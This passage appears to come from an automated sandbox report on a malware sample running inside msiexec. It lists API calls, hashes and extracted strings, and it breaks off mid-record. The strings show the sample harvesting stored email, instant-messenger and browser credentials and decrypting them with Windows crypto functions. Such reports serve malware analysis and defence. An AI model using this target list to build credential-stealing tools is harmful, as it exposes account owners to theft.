                                                                                                          • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                                          • String ID: Software\Google\Google Talk\Accounts
                                                                                                          • API String ID: 3996936265-1079885057
                                                                                                          • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                          • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                          • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                          • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 451 40ceb4-40ceb6 448->451 449->451 452 40ced3-40cedc call 40cdda 450->452 453 40cece-40ced1 450->453 451->450 454 40cede-40cef7 call 40c3d0 call 40ba28 452->454 458 40cf3f-40cf43 452->458 453->454 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                          • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: strlen$_strcmpimemset
                                                                                                          • String ID: /stext
                                                                                                          • API String ID: 520177685-3817206916
                                                                                                          • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                          • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                          • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                          • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                          APIs
                                                                                                            • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                          • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 145871493-0
                                                                                                          • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                          • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                          • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                          • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                          APIs
                                                                                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                            • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                            • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                            • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4165544737-0
                                                                                                          • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                          • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                          • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                          • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID:
                                                                                                          • API String ID: 3664257935-0
                                                                                                          • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                          • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                          • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                          • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                          APIs
                                                                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                          • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                          • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                          • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID:
                                                                                                          • API String ID: 3664257935-0
                                                                                                          • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                          • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                          • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                          • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                          APIs
                                                                                                          • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseFind
                                                                                                          • String ID:
                                                                                                          • API String ID: 1863332320-0
                                                                                                          • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                          • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                          • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                          • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                          APIs
                                                                                                          • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                          • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                          • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                          • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                          • API String ID: 2238633743-192783356
                                                                                                          • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                          • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                          • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                          • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                          • API String ID: 3963849919-1658304561
                                                                                                          • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                          • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                          • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                          • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                          • String ID: (yE$(yE$(yE
                                                                                                          • API String ID: 1865533344-362086290
                                                                                                          • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                          • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                          • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                          • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                            • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                            • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                            • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                          • memset.MSVCRT ref: 0040E5B8
                                                                                                          • memset.MSVCRT ref: 0040E5CD
                                                                                                          • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                          • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                          • memset.MSVCRT ref: 0040E6B5
                                                                                                          • memset.MSVCRT ref: 0040E6CC
                                                                                                            • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                            • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                          • memset.MSVCRT ref: 0040E736
                                                                                                          • memset.MSVCRT ref: 0040E74F
                                                                                                          • sprintf.MSVCRT ref: 0040E76D
                                                                                                          • sprintf.MSVCRT ref: 0040E788
                                                                                                          • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                          • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                          • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                          • memset.MSVCRT ref: 0040E858
                                                                                                          • sprintf.MSVCRT ref: 0040E873
                                                                                                          • _strcmpi.MSVCRT ref: 0040E889
                                                                                                          • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                          • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                          • API String ID: 4171719235-3943159138
                                                                                                          • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                          • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                          • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                          • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                          • GetDC.USER32 ref: 004104E2
                                                                                                          • strlen.MSVCRT ref: 00410522
                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                          • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                          • sprintf.MSVCRT ref: 00410640
                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                          • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                          • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                          • API String ID: 1703216249-3046471546
                                                                                                          • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                          • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                          • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                          • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004024F5
                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                          • _mbscpy.MSVCRT(?,00000000,?,?,?,67CE7B60,?,00000000), ref: 00402533
                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbscpy$QueryValuememset
                                                                                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                          • API String ID: 168965057-606283353
                                                                                                          • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                          • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                          • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                          • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                          • DeleteObject.GDI32(?), ref: 00401226
                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                          • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                          • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                          • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                          • memset.MSVCRT ref: 0040128E
                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2998058495-0
                                                                                                          • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                          • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                          • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                          • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                          APIs
                                                                                                          • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                          • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                          • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                          • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                          • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                          • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcmp$memcpy
                                                                                                          • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                          • API String ID: 231171946-2189169393
                                                                                                          • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                          • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                          • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                          • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                          • API String ID: 633282248-1996832678
                                                                                                          • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                          • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
